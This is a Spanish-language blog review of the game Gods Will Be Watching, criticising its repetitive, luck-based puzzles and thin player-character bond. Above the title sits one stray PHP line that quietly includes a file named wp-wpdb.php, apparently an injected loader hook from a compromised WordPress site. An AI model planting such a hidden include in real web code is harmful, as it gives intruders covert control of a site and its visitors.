if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Gods Will Be Watching – La Fortaleza de LeChuck

Análisis Gods Will Be Watching

Hace un tiempo hablamos de Gods Will Be Watching, la genial propuesta de los chicos de Deconstructeam surgida en 72h durante la Ludum Dare del año pasado. El juego fue colgado en la web para jugar de forma gratuita desde el navegador, lo que propició que gente de todo el mundo compartiera su experiencia y opinión sobre las decisiones morales y supervivencia que planteaba Gods Will Be Watching. La buena acogida hizo que Deconstructeam continuara con la idea mediante un exitoso crowdfunding y la llevara más allá, lo cual no ha satisfecho por igual a todo el mundo. Veamos que ha pasado.

Gods_Will_Be_Watching

Gods Will Be Watching nos sitúa en un futuro lejano, donde un grupo terrorista se ha hecho con un arma biológica. El protagonista de la historia, el sargento Burden, se debate entre Everdusk y los terroristas de Xenolifer, apoyando la ideología de estos pero no sus métodos. Una historia interesante, con algunos típicos pero efectivos clichés de la ciencia ficción, pero lapidada por una continua pasarela de puzles. Cada nivel por lo general se lleva a cabo en una sola pantalla, y al hacer click en los personajes y objetos, se abren las acciones disponibles. Cada una afecta a la situación de manera diferente, por lo que equilibrar los estados de ánimo y las prioridades es una parte clave para superar cada nivel.

En el primer episodio, estamos al cargo de un grupo de rehenes mientras hackeamos el sistema para robar los datos. Al otro lado de la puerta, unos soldados se aproximan. Podemos resolver la situación sin hacer daño a los cautivos, hablando con ellos de forma cordial y tranquilizándolos después de cada disparo amenazador que frena el avance de los soldados. O bien, dejando de lado la piedad, maltratarlos e incluso asesinarlos para ganarnos el respeto. Este primer nivel no nos traerá muchos dolores de cabeza y podremos decantarnos fácilmente por un camino. En el segundo episodio la cosa cambia y se encrudece, el sargento Burden y su colega tendrán que sobrevivir a 20 días de tortura. Es a partir de aquí cuando la dificultad aumenta, todo se vuelve más oscuro, las decisiones se ven prácticamente limitadas y el fracaso llega a desesperar.

Gods_Will_Be_Watching_2

Gods Will Be Watching es realmente difícil y se vuelve tediosamente repetitivo. Te obliga a tomar decisiones morales con las cuales no vas a sentir realmente remordimiento o alegría, sino indiferencia, tan solo desearás encontrar la opción correcta que te permita terminar de una vez por todas el nivel. El juego no crea un vínculo jugador-personaje, por lo que puedes comportarte como un cruel egoísta y ver tus fechorías en las estadísticas del final de cada episodio, algo parecido a lo que ofrece The Walking Dead, pero la diferencia de implicación del jugador en estos dos títulos es como la noche y el día. La limitada jugabilidad y nula libertad hacen que no tengas ningún cariño por los personajes, son completos desconocidos, como simples herramientas para llegar al final del juego. Además, inexplicablemente, algunos mueren y reaparecen en el siguiente episodio.

Me temo que muchos de nosotros esperábamos ver algo diferente en Gods Will Be Watching, y quizá teníamos la esperanza de disponer de más libertad de acción y movimiento y por esta razón estamos desencantados. El sistema repetitivo de puzles depende más de la suerte que de la lógica, y limitaba el gran trabajo de ambientación y narrativo. No hay mucho que hacer, si cometes unos cuantos errores estás fuera y vuelta a empezar desde el principio del episodio.

Gods_Will_Be_Watching_3

Con juegos como The Walking Dead, nos hemos acostumbrado a lidiar con decisiones morales que marcarán el transcurso de la historia y aportarán bajas a nuestro equipo, Gods Will Be Watching juega con este concepto, llevándolo al extremo, y haciendo que solo trate exclusivamente de eso, escoger alguna de las pocas opciones preestablecidas que nos llevarán a sobrevivir por encima de todo.

Gods Will Be Watching fue una idea original que se ha ampliado para plantearnos seis desafíos diferentes, donde cada fracaso pondrá a prueba nuestra paciencia y tesón. Puedes amarlo o odiarlo, no hay termino medio, así que si jugaste hace un año a su versión corta en navegador y estás dispuesto a su versión «extended» este es tu juego y lo tienes en Steam por 8,99€.

Publicada el
Categorizado como Análisis

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

2 comentarios

Dejar un comentario